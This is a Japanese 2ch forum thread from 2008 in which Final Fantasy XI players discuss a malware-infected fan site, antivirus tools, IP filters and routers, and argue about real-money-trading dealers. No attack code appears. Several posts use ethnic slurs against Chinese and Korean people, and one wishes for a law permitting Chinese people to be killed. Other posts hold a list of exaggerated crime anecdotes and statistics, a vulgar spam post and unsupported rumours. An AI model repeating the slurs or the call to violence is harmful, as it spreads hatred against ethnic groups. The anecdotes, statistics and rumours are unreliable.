PG2導入
noscript導入
ノートンは元々入ってる

890 :既にその名前は使われています:2008/04/30(水) 00:29:44.06 ID:oWP1sri2
ちなみにスキャン結果はどれも異常なし

891 :既にその名前は使われています:2008/04/30(水) 00:30:54.10 ID:yNNXcrqS
>>889
PCの環境情報を外部に送信するウイルスが仕込まれていたようです。
FF11等のパスワードを抜き取る類のモノではない。

892 :既にその名前は使われています:2008/04/30(水) 00:32:17.93 ID:oWP1sri2
>>891
なるほど、対策して次回から感染しないようにすれば大丈夫なのかな

893 :既にその名前は使われています:2008/04/30(水) 00:35:26.87 ID:JCq20zEO
あとは、念のためにインターネットエクスプローラのプロパティで
インターネット一時ファイル:クッキーの削除、ファイルの削除やっとけばokかと

894 :既にその名前は使われています:2008/04/30(水) 00:40:22.80 ID:o2BDnmtk
なんかカスペの検出率が高いとかいう評判を聞く度に
実は業者(又はそれに手を貸すロシア系のハッカーども)に
裏でウイルス提供→献体きたらワクチンだす・・・みたいな
マッチポンプなんじゃないか・・・という妄想をしてしまう。


895 :既にその名前は使われています:2008/04/30(水) 00:41:42.58 ID:oWP1sri2
>>893
ありがとう、やっておいた。

896 :既にその名前は使われています:2008/04/30(水) 00:43:59.41 ID:yiEz+75I
ロシアなんだよね?

897 :既にその名前は使われています:2008/04/30(水) 00:45:01.65 ID:CzZjcWFr
>>884
ノートンのシェアって高いの日本だけじゃなかったっけ?

898 :既にその名前は使われています:2008/04/30(水) 00:45:51.35 ID:CzZjcWFr
おれはNOD32だけどね。

899 :既にその名前は使われています:2008/04/30(水) 00:49:04.52 ID:/qebUNsW
週末にヴァナモン見たから、カスペでフルスキャンしてみたけどなんにも検知しなかった
Win2kだと拾わないタイプだったりしてね
でも、誰か書いてたけど、この手のウイルスっていろいろ対策悩むより、ブラウズ環境を
そっくりそのままVirtualPCにしちゃった方が安心だよ?
なんでみんなあてになるかならないか解からない変なソフト入れてるん?

900 :既にその名前は使われています:2008/04/30(水) 00:59:52.66 ID:5NNJi0k8
PG2いれてログみてると
シナからが結構多いね
気持ち悪いわー

901 :既にその名前は使われています:2008/04/30(水) 01:10:41.28 ID:BKOk44fP
POLそのもので対策できないのかね?
パスの仕様変えるとか

902 :既にその名前は使われています:2008/04/30(水) 01:12:40.24 ID:Vg1Z8rPx
ネ実ですらセキュリティぬるいレス多く見受けられたくらいだから…
おそろしす。

903 :既にその名前は使われています:2008/04/30(水) 01:14:38.94 ID:Vg1Z8rPx
>>901
バンク並みにすれば鉄壁だろうけれど
お金かかるんじゃない?
プレステ、箱、ゲーム用PCでないと
完全に安全といえない。

904 :既にその名前は使われています:2008/04/30(水) 01:15:30.11 ID:O20CZdh3
>>899
まぁパス抜きは9割9分WWWからだし、VirtualPCで安全にはなることはなるが
脅威はWWWだけでは無い訳ですし

905 :既にその名前は使われています:2008/04/30(水) 01:22:19.96 ID:JCq20zEO
何が問題ってwindows自体がウィルスと言えることもなきにしもあらず

906 :既にその名前は使われています:2008/04/30(水) 01:26:08.61 ID:2zDl8Dis
>>899
最近のウィルスは仮想環境から感染する種類もあってな
今は大丈夫でも、仮想環境利用が広まれば
業者も対応して無意味になる罠

まぁ、確かに現時点では有効な対策ではあるが、
過信は禁物だな

907 :既にその名前は使われています:2008/04/30(水) 01:40:45.64 ID:YY9zvNCU
仮想環境であることを検知して
なりを潜めるものもあるねぇ。

908 :既にその名前は使われています:2008/04/30(水) 01:42:51.03 ID:Y9jRicOl
>>900
それやばいんじゃね?
俺も今回の件でPG2入れてみたけど、
まだWikipedia以外引っ掛かってないや。
他の人も頻繁に中国系IPからの接続あるのか?

909 :既にその名前は使われています:2008/04/30(水) 01:45:52.80 ID:JCq20zEO
あるよ
ポート135とか445とか人気ある

910 :既にその名前は使われています:2008/04/30(水) 01:56:44.92 ID:XT1vYCaD
手っ取り早く中国のIP弾くにはどうすれば良いんだろ?

911 :既にその名前は使われています:2008/04/30(水) 01:58:32.03 ID:Fgk9Q1bB
まいったなぁ・・・月曜日にヴァナモン見て
今日夜勤で帰るの朝じゃねーかよ・・
一応パス自体は手入力だが、家帰ったら速攻スキャンせねば


912 :既にその名前は使われています:2008/04/30(水) 02:05:21.12 ID:xu+bX3Ih
>>900
結構多い ×
ほとんど中国 〇

913 :既にその名前は使われています:2008/04/30(水) 02:13:12.04 ID:aNDw3URq
IPアドレスごとアクセス禁止されるとか、終わってるだろ中国・・( ´_ゝ`)


914 :既にその名前は使われています:2008/04/30(水) 02:13:26.67 ID:THlXd+Tv
FFするPCで唯一エレメンだけを見てたが、今回の件で怖くてもう見れねーな

915 :既にその名前は使われています:2008/04/30(水) 02:20:04.04 ID:l20cb63E
ポート135-139、445へのアクセスをPG2が検知してうぜぇというやつは
夜が明けたらルータ買ってこい
IPフィルタソフトを使う以前に、そんなパケットがPCに届く環境はイクナイ

アカウントハック防止を目的とすれば、IPフィルタソフトの役目は危険と
思われるレンジのIPアドレスをのホストに対するアクセスを遮断すること

916 :既にその名前は使われています:2008/04/30(水) 02:22:57.91 ID:aipfgvWe
っていうかルータ使ってればそんなに変なアクセスこねーぞ

917 :既にその名前は使われています:2008/04/30(水) 02:26:06.91 ID:lvByt9fX
おすすめルータは
有線ブロードバンドルーターのおすすめを教えて 32
http://pc11.2ch.net/test/read.cgi/hard/1207577493/
のテンプレあたりをば。

無線ルータだと
光環境ならNECのWR8500Nあたり
それ以外ならバッファローから適当に

と先手を打って書いておく

918 :既にその名前は使われています:2008/04/30(水) 02:31:51.99 ID:SNCnTxzd
ウィルスバスターはトレンドマイクロ自身のHPサーバーが
SQLインジェクションでクラックされたからなあw

919 :既にその名前は使われています:2008/04/30(水) 02:36:25.50 ID:65s4cLPn
ウィルスバスターはWindowsをバスターしちゃうくらい強力なんだぜ

920 :既にその名前は使われています:2008/04/30(水) 02:37:11.13 ID:/hUImVGR
NECのはNAT漏れで通信できなくなるなw
鯖検索するようなゲームは辛いかもね

921 :既にその名前は使われています:2008/04/30(水) 02:53:15.16 ID:gem/GDow
まさかルーター無しで直にネットつないでるやついるのか?
いちどログを見せてもらえ・・・
シナから半島から世界から、やだ・・・何これ・・・みたいなパケットが飛んできてるのだぞ
ウイルスメール程度で騒ぎになったころが嘘みたいに平和だと言い切れるほど、
今のインターネットは北斗の拳な世界


922 :既にその名前は使われています:2008/04/30(水) 02:59:34.52 ID:UyFhp78f
ワシの種籾がー

923 :既にその名前は使われています:2008/04/30(水) 03:03:18.97 ID:MvE3a+uU
フレがやられてた
あんな有名サイトなんだからこれからもっと被害者増えるだろうな

924 :既にその名前は使われています:2008/04/30(水) 03:05:41.71 ID:u0oA/35z
>>923
何をやられたの?

925 :既にその名前は使われています:2008/04/30(水) 03:09:46.63 ID:Y9jRicOl
ああ、やっぱり変なアクセスが多いってルータ使ってないのかな?w
ルータ使っててもブロック機能オフだと意味ないけど。
ルータのログにはポートスキャンとか結構あるよね。

926 :既にその名前は使われています:2008/04/30(水) 03:16:25.24 ID:SGy3GRD8
今回のは直接害は無いみたいだけど動作環境調べて何するつもりなんだろねえ・・・

こんな手の込んだこと目的なしにやるわけないし、分からないのが余計怖いわ

927 :既にその名前は使われています:2008/04/30(水) 03:25:04.09 ID:9VTt78kx
>>926
むこうも対策されるの解ってるからリアルタイムで統計とって
そのとき一番使われてる環境を対象にしたウィルス作るんだよ

928 :既にその名前は使われています:2008/04/30(水) 03:30:53.34 ID:JCq20zEO
ファイアウォールで弾かせてたは

929 :既にその名前は使われています:2008/04/30(水) 03:32:49.52 ID:5NNJi0k8
1時間に5回ぐらいなんらかきてる
ルータ使ってるけどネトラジとかやってたまんまだからかねぇ
ブログも書いてたんでうーん・・・

今日休みだからいろいろFWとか設定してみは・・・
怖いなーほんとネットって


930 :既にその名前は使われています:2008/04/30(水) 04:03:38.29 ID:xZCTfQ+x
つーかお前らルーター使ってない時点で全裸でエジプト歩いてるようなもんだろ

931 :既にその名前は使われています:2008/04/30(水) 04:06:05.60 ID:dt60lyCm
つかなんでヴァナモン管理人ってえらそうな訳?

932 :既にその名前は使われています:2008/04/30(水) 04:08:37.26 ID:JCq20zEO
いいこと考えた
試しにお前コテハン付けてみろよ

933 :既にその名前は使われています:2008/04/30(水) 04:13:54.27 ID:0S+qI9yT
ネットみるならPSPがいいかね
携帯だと見れないとこもあるし

934 :既にその名前は使われています:2008/04/30(水) 04:16:08.17 ID:pFN0VxiJ
>>931
お前もえらそうだが

935 :既にその名前は使われています:2008/04/30(水) 04:20:00.93 ID:811BIWO0
>>930
それはエジプトに失礼だ。
せめて中国とか韓国にしとけ。それなら誰もモンク言わん

936 :既にその名前は使われています:2008/04/30(水) 04:21:28.89 ID:A5FCWosr
南アフリカの危険な町なんだっけ?

937 :既にその名前は使われています:2008/04/30(水) 04:22:53.67 ID:ptrhOjbP
大陸とか半島だったら、全裸よりもアクセサリ着けまくった成金装備で、札束入り財布見せながら闊歩したほうがよりたとえになる

938 :既にその名前は使われています:2008/04/30(水) 04:23:44.53 ID:DOiqpUiV
別に例えなくても分かる事を無理して例え話に持っていかなくてもいいよ

939 :既にその名前は使われています:2008/04/30(水) 04:25:28.57 ID:A5FCWosr
ヨハネスブルグだった

死にたい人にお薦めの危険な街ヨハネスブルグ
http://ebi.2ch.net/21oversea/kako/1015/10151/1015176193.html

ヨハネスブルグ Downtawn
http://www6.ocn.ne.jp/~cacadu/Gallery4-1.htm

・軍人上がりの8人なら大丈夫だろうと思っていたら同じような体格の20人に襲われた
・ユースから徒歩1分の路上で白人が頭から血を流して倒れていた
・足元がぐにゃりとしたのでござをめくってみると死体が転がっていた
・車で旅行者に突っ込んで倒れた、というか轢いた後から荷物とかを強奪する
・宿が強盗に襲撃され、女も「男も」全員レイプされた
・タクシーからショッピングセンターまでの10mの間に強盗に襲われた。
・女性の1/3がレイプ経験者。しかも処女交配がHIVを治すという都市伝説から「赤子ほど危ない」
・「そんな危険なわけがない」といって出て行った旅行者が5分後血まみれで戻ってきた
・「何も持たなければ襲われるわけがない」と手ぶらで出て行った旅行者が靴と服を盗まれ下着で戻ってきた
・中心駅から半径200mは強盗にあう確率が150%。一度襲われてまた教われる確率が50%の意味
・ヨハネスブルグにおける殺人事件による死亡者は1日平均120人、うち約20人が外国人旅行者。


940 :既にその名前は使われています:2008/04/30(水) 04:25:37.81 ID:YqLityT9
>>933
ipod touchおすすめ。
大抵のサイトみられるし、2ch閲覧のitouch専用サイト何個もあるし。

941 :既にその名前は使われています:2008/04/30(水) 04:52:31.36 ID:T6eX/efy
金くれ

942 :既にその名前は使われています:2008/04/30(水) 04:59:35.92 ID:1asz5GYG
あー マジシナチク殺してもいい法案でねぇかなぁw

943 :既にその名前は使われています:2008/04/30(水) 05:01:20.20 ID:5NNJi0k8
そんなことしたらシナチクと同じだろ・・・
法的に処罰できるようになればいいんだけどな
いろいろ難しいんだろうな

944 :既にその名前は使われています:2008/04/30(水) 05:04:07.69 ID:FFQkZxtO
>>942
考え方がシナチョンだよな、こいつ

945 :既にその名前は使われています:2008/04/30(水) 05:09:28.76 ID:XT1vYCaD
それだけ、彼の中ではどうあっても剥がれないヘイトを志那畜とチョソは稼いでるんだろう。

チベットの惨状とか、中国が他に色々やっちゃってること、
朝鮮もあわせて非常に嘘と悪意に満ち溢れた捏造反日行動などみれば、ね・・・。

946 :既にその名前は使われています:2008/04/30(水) 05:22:20.52 ID:6gRSa9SR
・HNMLS上がりの18人なら大丈夫だろうと思っていたらHNM並みの獣人60人に襲われた
・モグハウスから徒歩1分の路上で竜騎士が頭から血を流して倒れていた
・足元がぐにゃりとしたのでござをめくってみると暗黒が転がっていた
・「そんな危険なわけがない」といって出て行ったLSメンが5分後血まみれで戻ってきた
・門から半径200mは死亡確率が150%。一度殺されてまた殺される確率が50%の意味

947 :既にその名前は使われています:2008/04/30(水) 05:50:27.24 ID:YlUGEcfH
吹いたw一体どこのFFやってるんだよwww

948 :既にその名前は使われています:2008/04/30(水) 05:51:30.16 ID:ptrhOjbP
2行目はジュノでよく見かけたようなw
リューサンじゃなくて獣だけど

949 :既にその名前は使われています:2008/04/30(水) 07:23:48.84 ID:bCbTbjhL
PG2の通信履歴にアプリ名も入ってればいいのにな

950 :既にその名前は使われています:2008/04/30(水) 07:24:38.16 ID:D8PLixhP
ござの下は侍にしとけよw

951 :既にその名前は使われています:2008/04/30(水) 09:46:34.31 ID:jPfkR1kL
>>920
しかし8500Nにはスレを読んでる限り解決されているらしい

952 :既にその名前は使われています:2008/04/30(水) 09:56:30.01 ID:mBuPG0FA
657 名前:(・ω・) :07/02/08 11:10:36 ID:Fj1D2OeJ
アトルガン新規組の新人LSメンが先日ようやくアトルガンに上陸した。
しばらくして、ビシージ発生。LSメンでアラを組んで参加。
リダ:モンスターや獣人に注意してね〜、襲われるよ
まもなくして…
新人:なんですか、このヨハネスブルクは
リダ:↓↓↓アルザビのガイドライン↓↓↓
A:いきなり関羽に撲殺される
B:歩いてるだけで屍毒に巻き込まれる
C:ボムがありえないほどデカい
D:みんな一斉に身ぐるみ剥がされる
E:問答無用でデスとパーディションが飛んでくる
F:敵を目視する前にアスフロで既に死体
G:カエルに操られた暗黒が殴ってくる(ラスリゾデスブロ中)
H:大通りから20ガルカ以内は蛮族に襲われる可能性150%
I:一度襲われて、また襲われる確率が50%の意味
J:モンス襲撃による死亡者数は1ビシージ平均120人、うち約20人がガルモ
K:ビシージ終了後は毎回アルザビ市民が拉致られる
尻黒:市街戦開始から五分後に炎蛇将戦闘不能のログ

953 :既にその名前は使われています:2008/04/30(水) 10:08:46.32 ID:cxwyTCTu
>>952
ワロタ

954 :既にその名前は使われています:2008/04/30(水) 10:37:48.97 ID:7ESD7gcv
>>952
ここで名台詞スレは想定外w

955 :既にその名前は使われています:2008/04/30(水) 10:45:08.78 ID:WobuMyeC
ヴァナモンblog、グーグル先生にもウイルス警告出されてるなw

956 :既にその名前は使われています:2008/04/30(水) 10:47:42.04 ID:dHZhNaRq
ヴァナモンの次は白地図、エレメン、ぷれみあさいとw辺りか

957 :既にその名前は使われています:2008/04/30(水) 10:59:48.02 ID:yNNXcrqS
>>955
1ヶ月前の情報に今更気付くとは。
もうちょっとアンテナ張っておけよ。

958 :既にその名前は使われています:2008/04/30(水) 11:03:09.65 ID:QQ/sBZ2r
エレメンはRMT業者の提灯記事書いた功績があるので改竄されないんじゃないかなw

959 :既にその名前は使われています:2008/04/30(水) 11:03:40.49 ID:QQ/sBZ2r
あの記事のおかげで一気にRMT利用者が増えたからなw

960 :既にその名前は使われています:2008/04/30(水) 11:07:22.55 ID:m4HLBjwH
そもそもエレメンはRMT業者が運営主だしな  あんなサイトを見るほうがキチガイだ

961 :既にその名前は使われています:2008/04/30(水) 11:07:49.99 ID:8ozjb8NL
昨日のビシージ前、高ランクのキャラが素っ裸で
宅配の前でずっと佇んでいたんだけど、ビシージが
始まっても裸で死んで、終わった後もそのまま死んでた

被害者?

962 :既にその名前は使われています:2008/04/30(水) 11:16:33.31 ID:AFHJ6E7K
暖かくてわいてるの多いな〜

963 :既にその名前は使われています:2008/04/30(水) 11:29:58.29 ID:PteQZYql
http://ragserver.hp.infoseek.co.jp/cgi-bin/img-box/img20051016124829.gif

19:Ragnarok(ラグナロク鯖)のおまんこツーラーLaphx様参上!
相方のWellsとツールで釣りまくりです^^;

ラグ鯖最強のラップとウェルを今日もよろしく!

964 :既にその名前は使われています:2008/04/30(水) 11:30:48.75 ID:AFHJ6E7K
>>963
すれ違いも甚だしい

965 :既にその名前は使われています:2008/04/30(水) 11:34:50.62 ID:DuTEdaPD
なんでヴぁなもん簡単にハックされるん?
された振りした中華の手先なん?

966 :既にその名前は使われています:2008/04/30(水) 11:48:48.29 ID:snoQeKiZ
わろw

967 :既にその名前は使われています:2008/04/30(水) 12:05:31.56 ID:7bM/c6X3
マルチポストの相手をするな、そしてsageるなageろ
そしてage

968 :既にその名前は使われています:2008/04/30(水) 12:13:01.12 ID:DYceQXY5
会社からネ実みてヴァナモンハックを知ったぜ
4/28、4/29にヴァナモンみたわ・・・まぁ垢ハックされたら良い機会と思って引退するか

969 :既にその名前は使われています:2008/04/30(水) 12:15:07.15 ID:Y9jRicOl
中国人の資金繰りに手を貸すぐらいなら潔くキャラ消して辞めてくれ。

970 :既にその名前は使われています:2008/04/30(水) 12:42:46.45 ID:7bM/c6X3
業者関連スレ堕ちすぎだろ…
いかに無関心か良く分かるな
そんなだから業者どもに舐められるんだよ
「自分は大丈夫だから^^」っていう日本人特有の平和ボケを治せ

971 :既にその名前は使われています:2008/04/30(水) 12:47:09.93 ID:XT1vYCaD
要らないスレだから落ちてるだけでは

972 :既にその名前は使われています:2008/04/30(水) 13:22:58.99 ID:ba5HV6DE
http://live27.2ch.net/test/read.cgi/ogame/1209529165/l50

新スレ一応建てておきました。


973 :既にその名前は使われています:2008/04/30(水) 13:45:27.55 ID:Vg1Z8rPx
>>960
たしかな根拠は?

974 :既にその名前は使われています:2008/04/30(水) 13:50:46.20 ID:hSEXNayr
えれめん粘着は昔から居るので蟲しとけ

975 :既にその名前は使われています:2008/04/30(水) 14:08:19.74 ID:0nMx2Q2g
>>972

>>843

976 :既にその名前は使われています:2008/04/30(水) 14:35:53.31 ID:tL2Gg99p
>>973
脳内に決まってんだろ

977 :既にその名前は使われています:2008/04/30(水) 14:46:00.07 ID:AFHJ6E7K
ねたむ奴はねたむだけしか出来ないからな

978 :既にその名前は使われています:2008/04/30(水) 14:48:16.57 ID:d19R9ECj
日本語でOL

979 :既にその名前は使われています:2008/04/30(水) 14:49:03.65 ID:A5FCWosr
女性会社員

980 :既にその名前は使われています:2008/04/30(水) 14:53:45.30 ID:A+JxxStD
えれめん信者に言っても無駄なんだろうけど
まだ削除されてないのか知らないけど、RMT業者の記事読んでみたらどうかな
「アンケートに答えてくれた業者は優良」
「買った人はBANされてないんです」
みたいな、ありえない内容だからw

981 :既にその名前は使われています:2008/04/30(水) 14:57:26.56 ID:AFHJ6E7K
>>980
探すのだりーわ
リンクよろ

982 :既にその名前は使われています:2008/04/30(水) 15:00:13.71 ID:/qebUNsW
>>981
ほっとけ
レクター博士に脳みそちょっと吸われちゃった人なんだろw

983 :既にその名前は使われています:2008/04/30(水) 15:01:08.24 ID:A+JxxStD
>>981
信者なら自分で探せ

984 :既にその名前は使われています:2008/04/30(水) 15:02:58.52 ID:tgpHSDG5
それはお前の解釈がおかしいだけだろw

985 :既にその名前は使われています:2008/04/30(水) 15:03:30.66 ID:AFHJ6E7K
>>982
ただ埋めるのもひまだしさw

>>983
脳内ソースだから出せないんですね、わかります

986 :既にその名前は使われています:2008/04/30(水) 15:04:40.35 ID:C8EgaYKU
別にあの記事自体はRMT業者の言い分を載せただけだろ
それをどう判断するかは、読んだ人次第だろうけど
あの記事がRMT擁護に見えるなら、ゆとり過ぎると思うぞ

987 :既にその名前は使われています:2008/04/30(水) 15:07:01.64 ID:A+JxxStD
あの記事に背中を押されてRMTerになった奴多いと思うぞ

アングラなものだと思ってたのに
公式ファンサイトで取り上げられるくらいメジャーなんだ
思ったより安全なんだな
中華業者とか、アンケートにも答えないようなところは怪しくて危険だけど
以下略

988 :既にその名前は使われています:2008/04/30(水) 15:07:50.57 ID:DV1zEHzt
サイト開いて一秒で余裕でした
http://www5.plala.or.jp/SQR/ff11/contents/specials/index.html

上メニューSPECIALS

989 :既にその名前は使われています:2008/04/30(水) 15:09:57.11 ID:C8EgaYKU
公式ファンサイトwwwwwwとかwwwww
どんだけエレメン信者だったら、あの記事で背中押されるんだよwwww

990 :既にその名前は使われています:2008/04/30(水) 15:10:04.07 ID:4eOL7JCg
攻略情報以外を見る奴っておるんだな。

991 :既にその名前は使われています:2008/04/30(水) 15:11:36.25 ID:4eOL7JCg
そいや寄生虫共はRMT団体立ち上げて健全なRMTとかうんぬん言ってたが、その後
逮捕者ボロボロでて大人しくなったな。

992 :既にその名前は使われています:2008/04/30(水) 15:12:49.85 ID:AFHJ6E7K
アンケートとれたのはつながりがあるからだろとか言ってくるに1000ガバス

993 :既にその名前は使われています:2008/04/30(水) 15:14:12.80 ID:A+JxxStD
>>989
RMT擁護してる内容だとは思ってないよ
書いた奴が馬鹿なのか、計算高い業者の犬なのかはしらんが
そこから読み取れる情報で>>987みたいなことになる奴もいるってことだ

994 :既にその名前は使われています:2008/04/30(水) 15:15:38.55 ID:AFHJ6E7K
だとしたら>>987みたいな奴が馬鹿でFAだろw

つか最初の勢い無くなってきててばろすw

995 :既にその名前は使われています:2008/04/30(水) 15:15:41.60 ID:hSEXNayr
>あの記事に背中を押されてRMTerになった奴多いと思うぞ

証拠は?

996 :既にその名前は使われています:2008/04/30(水) 15:17:56.43 ID:JApsbe0S
どっかの小さいMMOのシャチョーとRMTの会社のシャチョーが対談して
MMO運営会社のシャチョーが「人の土俵で勝手に相撲とんな」って言ってるの覚えてないわ

997 :既にその名前は使われています:2008/04/30(水) 15:18:29.29 ID:A+JxxStD
アホな知り合いが実際に買った
あのころは買ってもなんともなかったこともあって
記事の効果絶大
その話を聞いて買うアホもいた

998 :既にその名前は使われています:2008/04/30(水) 15:18:45.90 ID:A5FCWosr
1000なら

999 :既にその名前は使われています:2008/04/30(水) 15:19:17.19 ID:4eOL7JCg
あーあ、やっちゃったな・・・


1000 :既にその名前は使われています:2008/04/30(水) 15:19:36.17 ID:hSEXNayr
そんなん証拠になるかwww

1001 :1001:Over 1000 Thread
  === Area: Live Networkgames@2ch http://live27.2ch.net/ogame/ ===

      //
    / .人      あ、ぽこたんインできないお!
    /  (__) パカ
   / ∩(____)       このスレッドは1000を超えたお。。。
   / .|( ・∀・)_       もう書けないので、新しいスレッドにインするお!
  // |   ヽ/
  " ̄ ̄ ̄"∪


230 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)